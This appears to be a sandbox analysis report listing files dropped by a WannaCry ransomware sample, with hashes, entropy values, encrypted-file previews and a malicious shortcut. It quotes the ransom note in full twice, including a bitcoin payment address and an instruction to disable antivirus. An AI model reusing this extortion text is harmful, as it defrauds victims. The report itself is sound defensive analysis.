                                SHA-256:2B6DFF11D47FB42766AE1E4CB48A13634F5582E9AECA78BF98C4402225B4B94D
                                SHA-512:6A9E821E53F9D3E7B16E7CC30FC95404F90A402E7C85A89C516D4F6B0965D7B53FA99DE28107600EFEF21581D12EB37A7F7C91AA7551B010BA8709C648368C3C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827938735234342
                                Encrypted:false
                                SSDEEP:24:bkXxLQh7NhvRQXpGHuQBPh6q9qn6UtCOBbfvzH9aULElkd35ZCIVCSRjCLu5:bkd8BsZGHrr6Ln6UpB7zH9dByoCSRjQ2
                                MD5:2C09A8AE375209655BC14EFE4D4B706F
                                SHA1:85919D205D320A65E36412A9B97570901DACC712
                                SHA-256:72E1F4152BE1A9F8B78D7D42F32E5069DD93B140E1156CA3FDFB7B2008CDCA32
                                SHA-512:42F9943A78757964741B9F101D11F8F36D2A041D590021484A2F9EEBCC084D5E3485F44CC1462E582C691422404B415389EF5E750ADBEE31F6A9D85638E74B8D
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.833426527863054
                                Encrypted:false
                                SSDEEP:24:PtK/RyPrlQ00EpkwTG4xw1v4CWZceDJ4ahAx1Kj14hZIc45Bvsi:P0arlQ/Epe6wSZceDJ8x1KZ4Hu9R
                                MD5:2D0B8257AD7B0279A7354DEBE833A3B9
                                SHA1:D86E905E8366A4D5615CBB0F2F90F78760F143CD
                                SHA-256:8EE8D2735750FE840E58C14D8242C3F9799FECE1768016F0C29473C9AAABEFF2
                                SHA-512:145CDB125516C1A24D4B63B1509B503DA901EF05D303F841E6DF20D935DEEAA2446070C38C91A6E23145B30443D2ACE1A4C92D2D7EC3C2FECF03D0F057425D17
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.847876858206974
                                Encrypted:false
                                SSDEEP:24:bkK4kzYcLDMh/hx+H9uC7o98wPRXj1oZt3ArrPMZegQQtDi8iQ0nc1yzA59YN6sj:bklky/wdV7ouwPtCZAfPMZegQQtDi8il
                                MD5:EFB94E62B4916D0005CD4B82E73236CC
                                SHA1:423C1324CB518B69FE186D37AAC7FEFD22F0BE3A
                                SHA-256:B73D4939C424100E561F39879F909A5683946EC21D84969D9C4EBAA75260BE51
                                SHA-512:569C9129C95A51A8B5634B3A06303144DC9B0A53FBDC6C8F6E58AA720E0D1DC86D46329174785B8ECAA9D580C1CC8586F20B2702387B6EDD2075D9F8B09AA11B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.797520945849408
                                Encrypted:false
                                SSDEEP:24:yJjUwxn3Tr3/dPEEFZpfJ7TU1E2YJ1X6mbJvhFW:yJ7ZTr3/dPrZpRnn/J1tbFhFW
                                MD5:52A6B25E49BE4E5D1F51C07BCF832B14
                                SHA1:5CD474970A55A5467D3186A0C1A980CA6FF1F530
                                SHA-256:42C1C27494643F98CDD5CAB1A98481D8B9AAB464F84C77F7E50E9AA0CE28918D
                                SHA-512:436ED29C76BA216AD9041AEA10ECC496FCD560C3C5E9C06856DB25D408A4453BC9533CAA1977A3704E1DBF59AB5D4E75C99664284F9380A8D0C7E7285AB06B53
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.826261221658806
                                Encrypted:false
                                SSDEEP:24:bkHtE4XTR+eYT0oVrpCajjFyeZOPOBq8LG5QhT5k8TP+6Vyoth/hsVv+lvVw:bkHtMtr/FHsPOBq8LGCV5Won/WVv+lq
                                MD5:1C6CC02A918B6B70B4A48FC499044CCD
                                SHA1:98F417DFC9EC2DC48EDE5A6A71CD490B420D318C
                                SHA-256:3C6507370453B75315F529EBFBB9C637EFF66EB4BDBCBD9C5DDEEED89A2B3046
                                SHA-512:F0ED06C48A26E1ECE8A8937729C718F382CF18F3453FD1D75A8AAFC688ED56598290C6BD47F8E2493BD3E3C3BDCB4B752574FBA2347EAD8B50672F1956C74ED7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.830056735934519
                                Encrypted:false
                                SSDEEP:12:IhhUebRvpnjmOsaGEvPybY6Guk8X2u9lnxw1mrXEY0IMX1+tgdfANPiwEjhAeVy+:uR1JpjGWPyE6Guk8GufxA6nXkZR8+l
                                MD5:B691AFBE4C872EE57BE3B1726C85542C
                                SHA1:690119BD587510BE129E011E6B389C6DC027CB1F
                                SHA-256:8CF47955317A3C930AE82B26FECE869293E2F4DB82F172292D8D52F86935D3A3
                                SHA-512:E4D94B0A7110265669DBE1CB9605E37F4C398ACA467013B31B36D091AF20A3347CCD626CB8ACF9C71720A7F5BB65277CCCF0338EE30DA621BF02418B18DF676D
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839919853759067
                                Encrypted:false
                                SSDEEP:24:bkNsR5hQgfeMqRP/Pm/FybOI4V5T35vf0ixyG9opmLJy/oK9cxn08pRZlNU:bk4GgfeTRP/PmGT6p5vTPum1Ub2pti
                                MD5:582259F4F31667EC91450CC1FD7E59D6
                                SHA1:85F3DF6AAE9E290E95D1DD3A0A228B2C9E90E8CD
                                SHA-256:65E56E6146A20EAA8D43C073D61941B8156159F131F83D2D4BD9D40AED34769C
                                SHA-512:F8E5ED7E9AAA24E4892FDBFC15451F5A4DC452B43D369EA8FB20C123958270A3E346D1CA81DD747C0E2ED27A27190D0F1FE719F16AF230DA381B759E41CEBE9E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.821736657797796
                                Encrypted:false
                                SSDEEP:24:ox00OXrinJmitWAYKqJhxtdImlXJtaUYoXPnO9xuCC9fMRLmJ:oJObgJZtbqhImlZb/O9kfSW
                                MD5:FA4B7799C649E18CDFD9C2D7DEDCEE91
                                SHA1:03EFAA14F650E48677537F7F88A7E6B2BB0F42A1
                                SHA-256:5FF9E5FCBAB200E22DCD20F717BD758E0FA222D6FBC9C95F994303F9C121F632
                                SHA-512:F33EEA0D1EA75657CD05A3DD22EC1913C5D2E1045146826D360CD69CBDC3707BA3FC2D18CEF24271364B224F2F136B5E97500AF6477C13A920E003B4B7411A74
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.831166004001975
                                Encrypted:false
                                SSDEEP:24:bksXFk8YGnOf0TICH2FXUeLLvF+0SE6fUcjuISX1qMc0PBqJf5GvAJuVGtOC0j:bksXXVnfTIu2FkSt+0KfXuIiG0PwJfv0
                                MD5:A4C2DAECDBEF5A06DCAB493F2B7B3323
                                SHA1:EE94AD4D874497DA24F0106FC27EEA67341CC7C8
                                SHA-256:9FE8DCA993D2BFBA8DCBA6434C40B39127AF5B3F331777249A04A6C9E5624F83
                                SHA-512:D96C29430E7EE33F06961E874194540B5EAF9941FD19482EC6AE570C87A1F9D1FAC9DF9FD25B7043E1B2FDB5D1599B4D8B9E79D501C8D52CB66CDD13C28876AE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.798945641474471
                                Encrypted:false
                                SSDEEP:24:Of65gI3p8oIb5v9ZWblQnNdochn9ZOBC9RhrdPLQ1wr/dK6:C83p8NNoYn9mCBdPVDdK6
                                MD5:55F0410C87961EE951EDA57A3A15223A
                                SHA1:236BB0E545382D0D767DD26647EFB07960B24523
                                SHA-256:6231E2BA2F03609A39DC28E1296B799B6B22E6345581D7EBD3B407A9B7CF4DFF
                                SHA-512:6F2C71447FA8F385A51290088A93430CFBBBC13FB1CB28040A9FAAF9716F3E84ADA50BFD9ECE6F1FF44651933611FEF70FB611814D7AB5363350314633667A57
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83754194698253
                                Encrypted:false
                                SSDEEP:24:bkhuwXmRYC8ZcyRtnAK2+a4vYp4BW2gGpkPRHm2Go9HqTF3zk5E+PGblAOc1EgHt:bkhf1vw+A+q5EQKT9KpPS2n7yyR
                                MD5:45DB52F5DCADCBCBF5D4947D11FE9214
                                SHA1:EB6DCC53A8BF48ADF264AB249FA0B591D403E193
                                SHA-256:970018BCF4D288217DA749021EE9B58A3CBF118F9E648A796DB663A7CC7FF9A8
                                SHA-512:E598534CB5D518D5DCBB2011D95B9EBCBD7BCB6E323F763D851F589F90852D5BA17FC44709C1EAC9CA4639DAC19518688431B58DEDEF40E0F8474A798280ED7C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.834673975545809
                                Encrypted:false
                                SSDEEP:12:Up1FIiTLXZ5L33duqXZPWwHQH+3DWpAMufMZxoKdK6zKWUbH9elRpLVo3ZbTJ4o:oISjL3rP5y+3iOSdKJlbH9oeZbT7
                                MD5:A392907AF32F21ABE00BA0AB29FDF5C3
                                SHA1:926422D5E0E82D5F9965355B8BB15F532646D8D9
                                SHA-256:8912017E30AAC220B5405A71BF82C8AA5B7A2762851734EA5042F01FE19C2EE9
                                SHA-512:963956FA034E37CCB29E44D04D05CB8862446210D78067BB0F7C145D1762B28457DF64FBEC8C640966B9A738874FB9D9303209CC6F9C6625EB9314F8BF47BAD8
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.82833513809369
                                Encrypted:false
                                SSDEEP:24:bkJvsX9vbrJ/PhycChPYurBLYmByp1S1WedBn2T+EHDp6FXO3VXUYUyF:bkcT5P6YurBLFB6SEhT+/FXa3F
                                MD5:B29A55CD8011724A796CB7A63C0D260B
                                SHA1:0BEA878D1974DAA8FB970E97DB26DDDD449CC20B
                                SHA-256:E05EAB750EECBF54EFC2E6A140C9CEABBE37E130905D2EFFCBA94F39DC4AA54A
                                SHA-512:AF88FBDB87634A9EA6DD321E1C7780EF7639130A0BD7BF3C4A5D7E8B39522EBA628532FD0072377CAEFFC5D7C9D47355999A89BA589A5914B77FD4AD74A0FE13
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.831093310456125
                                Encrypted:false
                                SSDEEP:24:mx1iWNbT4FKV5BQQkHlA3Ijmr6QoP9W/9GM64Z05zeIBzshOdM:mvBMC2w3ILhVW/4MBEzeIBjdM
                                MD5:304E2BDB46283B48B9C4115AABB51C86
                                SHA1:0A4D98A9FA3699A7CBA61FD86F28317AD8567B11
                                SHA-256:CA5EAA4F5C3695F96BF3C51650DF39A3F77F2BB58897A201011890053EF7A551
                                SHA-512:9F054E1ED6D0BEC131A0178673C9CF538F462A9DC299B6A331D5537252220352150634376C612CCFBC8FB8FE748AA31C9EBC1D2D56BF16604AEDEC31937EF73A
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.840596828301155
                                Encrypted:false
                                SSDEEP:24:bk4xCTTcN08KoooK5DpBPIRQoPXKAiwLMLXT1AJPFX7o+:bk5Ohbe5lINiwLMLBApFX0+
                                MD5:769E75EF98DFED5AEA7BF7CC859944CD
                                SHA1:14534DF8041EEE8CC485BD6F7574A60231613DEE
                                SHA-256:568D9AB9A647FD920F1E6C5C195375EC336357DE0A1B9DB1732D7D385E12ED64
                                SHA-512:72A89724AD8693148DADBDBBC8F424FA4CBD455BED38E9D5F0B7D40716F50859152E468388F74E201ED71332FC77F29E84B27F2A6742DF0C903FE3032D7BD6CE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807039241974979
                                Encrypted:false
                                SSDEEP:24:3/wAigFVAV4Q8ue9USlpcqroTMa/Yco4bJIGlRA8cJkIncQG:PiV4LtpcYay4bPAL6dJ
                                MD5:28ABEDDC7CD30E2CEA9273076138ED65
                                SHA1:E9D36F19CEF016E58F086E15E41561EB3C24AAAC
                                SHA-256:B0C691392A5AE2BAA6EEBB09DFF114E23EBA74A64CB96CB558BEF78FC5EBC9D5
                                SHA-512:9CDE0D0404469BB61EC877142CAEFFC9515F2C60078DDEDFB612286FC2F5031BB9EDB2C4B39037F3E492554C65E5B8453FFE1E8B6CB6E956CA4CE5DF75B44027
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8233636499914105
                                Encrypted:false
                                SSDEEP:24:bkDQselqW8bUsTOC5qg4yvT9fAksEW+cG/DvP/GW4BO179twtJ22erty6:bkDQHlmTTEgTVOaDvB9tyJ2lL
                                MD5:6EE0D43857087E2542224570894745CD
                                SHA1:56009AD68B1843A37C0907A028EEE46A76A4DAEF
                                SHA-256:8D163111354CD9F93864003FA78D48754D0BF2467F46A55C843C8ACF7580B3F3
                                SHA-512:FC65C419BCA0EDA64C1926322848DA192BA7BB1DF1E4919B0F5ED2BBFD590D68D52DAA4BC6DA90A46CEEA8B6D4053C60E8EE9F4057DB8546EB38A58E85D3A01E
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.813992415166788
                                Encrypted:false
                                SSDEEP:24:KR2ukTravRDPhAT3KXJW0bp9Yy+zQGBupSy0sltI+HGz:KR2DTraPATad9YyBausCtI+8
                                MD5:F56BBC05AA259652819874AE0D852CE8
                                SHA1:6241529FFD94507DB2EAE38FC327C9AF16BC7A9E
                                SHA-256:9F66F87C21B9BA46BCE444C5D29AFFF55BF2386B998D0D0F674E295042C2D8A8
                                SHA-512:C05E8A62671EE276443C3820F669092101A8F2CD6BB97838355A192E48B2AEBB2EB57AD85A3C7B948ADC593FC73F620FF9A3E2339C7AEF39AF74C7917A5A59BA
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.87276983399508
                                Encrypted:false
                                SSDEEP:24:bk9fRSvwxRLiM16s9n6vCe/T4iRVNzWBJi+Tnpf186119YxY347pcquopxwDGFCD:bk9fAORRws9C74iRXuEspf182qC47pcl
                                MD5:55306471244D0513BB6D0B7CDA7A7DCF
                                SHA1:B00F1A9057DE571907423E8B9BEFB18341D5E19E
                                SHA-256:01AFCE5C3AD33BF8D915EB50A66076C3FCEE80384752FF21F60015FDD454955B
                                SHA-512:F30A59A70D240D16B5491FE96A6BC92C3B262768BAF99C71F74EAC36691B5E5327C659C803BFE1D7FEC9EEBF9AE73D58A295F11F0F5D1C2765DB4A5AD032C3EC
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.833887242182343
                                Encrypted:false
                                SSDEEP:24:/XKaNYO9R5tmUhvWQBXtG4dXwu60S4dUaWxyM8zuhwLhPxzAsFw:/bNZXtmUcSX0sD60S4yNhwxxzFw
                                MD5:A6EE77B5DBAC11EF793651C54EE8341E
                                SHA1:1EAA77581080CF2263EBDDD46D481D64876CE6FA
                                SHA-256:17D80425DD178DADB9B35490039762838E0089B48944781F383D17EDCFA770F2
                                SHA-512:D819F38DC5739B7AAB85362973FAB1DB416387A9FEC535CF201A9C4650B6FBB72AE8A264D805DBE8BC4F097FB76F551898F0C77060BF79ADA52D4AD33714FD85
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.836765864853789
                                Encrypted:false
                                SSDEEP:24:bkh/Gepq7wfVRbAOI1vXm7Gy5spbbDs6nFRoi160y2P4XeJYCpke1XA:bkh/Giq7yvbgRuGYyfDs6nFfRgOnpXA
                                MD5:34FF5B592E2C55A9C033EEB468D08E08
                                SHA1:89441AB0791D80FCF0EA2965617AA391C6B4FA67
                                SHA-256:2E039609F67C992403B5CF93FE752F94572AACFF8773AB58B4B891D42939818B
                                SHA-512:06B41F636C1F3B5FFE533BA3874F2957E6DFCFA7F9387DA885F484665555BEA96FF164FE5136F1F27E31AB968890C3DC0F4BEABD11769679368B4F2DCE6F7659
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.811179423008834
                                Encrypted:false
                                SSDEEP:24:RiAOXebtyU4Sr3tDECOeMHtsXvaYJKBVasMJ4YGFPjqh:RVDbtvDBKeMHtkiYJ0TYQj2
                                MD5:80B7F146405BDE958A0118421809840A
                                SHA1:F9A740FFFFFDB94A8DDAB5F434457B5A07A3A2BE
                                SHA-256:489400DB440459DA81B1C2C0CB0D0E6AE4F620FA8625B374D00728A71C6686E7
                                SHA-512:A32FC3B3868A0A5EC4027E40918FF352090CD40FA1CBD7EAEF2DA96A494D60DD8A58B34D56A57D8388B427077F32AE1EBFE162808508647C8594E15C7211B9EB
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846474321136854
                                Encrypted:false
                                SSDEEP:24:bkwljmqLSAYSr+YFF/Ov5xrc2oG3pscmWfFrX9U4J2UYIJjV/hdLsZBnIUrI4:bkqkFSFfW/rRoG56WpuKzVsZqUrz
                                MD5:5E948845A4A605F8F7A70F6E1FB3351C
                                SHA1:0281FDB02F96512D69327624AB9711928356B91A
                                SHA-256:CCCFEA5B1664B574C55259FA542F19552BF75D8C2722014B2C5C47C687645D3A
                                SHA-512:4D01EC4139CBB15EDCFCCAD03584A517338731791F39DB0B40EDA3BE1D0084CA49F9501FBE4B20C8197179C33D7D2F025A08E5A655B369ED4A18FFCEDD681807
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....[.x......J..S.L..>..R?.".s......ih..H.D$.]....6[1w=.q..3l...J#...%..*.....s+..b~...6.vyD..oK.k..;Z.)..5...O7s.z|@~.>.....@4R..\A.^..F......<.#..y.....}.... .>.T.......c..m.#...1O.@..+NKJ..Q9.x..V...b.....^......tX#j?...\....I.C..q..EP.....{............8.{....Y.p.D.O)..>v..l...........oo#M..,.+.C....N].J!f.t....L..\.l]Y..A..{O../[.%........=.....G..6o.&5i3...d:..S2c%.0i...N......6>.{`..Q+......\ujuR.p4.......(N..l....N.............*...{'.g(..........._/..[.9.q....9l..]9{o.wU6......DZ...$R..j.Z..T.k=.e.....u.>....,.../.....t.....!X)na.L..u..)i0..bi....^.3.Q.s.R..\r}B....A.&oX.).qU...`_r...B..6..;.n.@.V.Y.Y...\tZb..%.-}....+.B.......x-\..4.-.....#[.c.v..]C.Pu..?.-..av.:..6..+.(O..q=......}.o..*..G.D.na,.L....nrd...`z[]y.;$........&4..X....x.V&0.Vd....L(tt=..$5.{9K...n.bz.R..).JL...D.74..F..^R]......)..1I.....F...}=..M}UO...{....W..I>..P..5...."<H..E.p..4...gJ.8....%..'..j.f.:.....#.k...Vct..,.@n....r}........e....Z.....R~......
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7834522779236845
                                Encrypted:false
                                SSDEEP:24:BwQ/rj0jYEh7UtD2r06bzAFnAeqnahwP7VS:SQ/r457TI6opdqCwP78
                                MD5:80D963B9CC37AB3C327BF6E628BC376E
                                SHA1:2EF8AA9A691EDBF0ADF3C6EE2E8555D478C7F6DF
                                SHA-256:F81AE5D8830FA56F477C0E89590CDDA87EB508C086FF363BBA3F84E2E8A86CD8
                                SHA-512:CAD9D9476E5348B195461156BC81A2CE5B747186EB48AA1EA82D6D9018D1B97D0BED4B5E97D0546E304668BD707598AD4FECFEB8691B0538C2EF748446CAC756
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.837536760254247
                                Encrypted:false
                                SSDEEP:24:bkrJFYRSY9SAWnqyrJqVXj6DOF1M2p99g7IJrMCxDUveWvIReSXi1eIEBJ5u3U0P:bkrJi7OsVm0g7eMC9YzvIYSy1eIEdu3H
                                MD5:AFA864B1E7A4065C0696063F90E965F7
                                SHA1:C575E9BFEB73DD25805484FC63EF157512983DDB
                                SHA-256:BFDAEC659184E67543C9C59B03ECAE29529082C47F4B9ECF034C53CC3BD3049B
                                SHA-512:8FB0DDDD4B7A63D17F5AF5E9EBC2AA59929D7A89BF22E44FFCB13E95E08EF0C48E2134B1121260D2ED21B18A25583341BA80C27508FF51BED02F0F7F233DFE6E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......w..x)f.Hrf..\..`...{.uT.... .M.Y... =J..(.....F`...x:a1t.......bs.G.a0yd.7-.D.b....^.......O~k..Er.$V.F.W.....b..$~Z[V.h..Ir.-..9^..7...\.|7^.c*Y...=.bX0.O..O5.PW._.M..d......VA.Y.mN....8fe....6...l.~.y..v .7......-...#.KK.Q.#...}..fQr+oE<.............l...}..0.]68)P...d..;9..$.........h.V.gy..%).DF?C?P.I..5....MV.B.Z...v..3Q...........H.z.2.2SdK...V'Of...I......Y..W..-JJ...U..p.k..7..".>........By&.d5.ea8n.X.1.?..'H.._h\..B.^P..........Cq.8.{o..9..o:..z..Q.....#.a.N...(.&......y.P=.b4...8......-............).*.SD.q^..F...M..'.].e..tM.B6....N....'...q......WXr.c.^..XL.S2.@..^...@T....8..w.....f...g..X..+.S ..T..r....'..}...O($.C|..v._nu..>h]~..87Yk.j...,..Uw...;..V.....N)..}..@.._e.qJ............"M.AKF..l?.$[..1:._......Kh...Q@.p=XfI.NUy..,w.qm.....+.E...3..h......d<.[.Ybd........\F..X...9..^~U`w.7*....w0.v."y......'.....)..!...H.F_6^.*..CW^...E7.q..'X}.P..E*|..$.\.,...e.~..W.#.n.+o..D.j...I..SC..|.6..2ZU.f..B.....
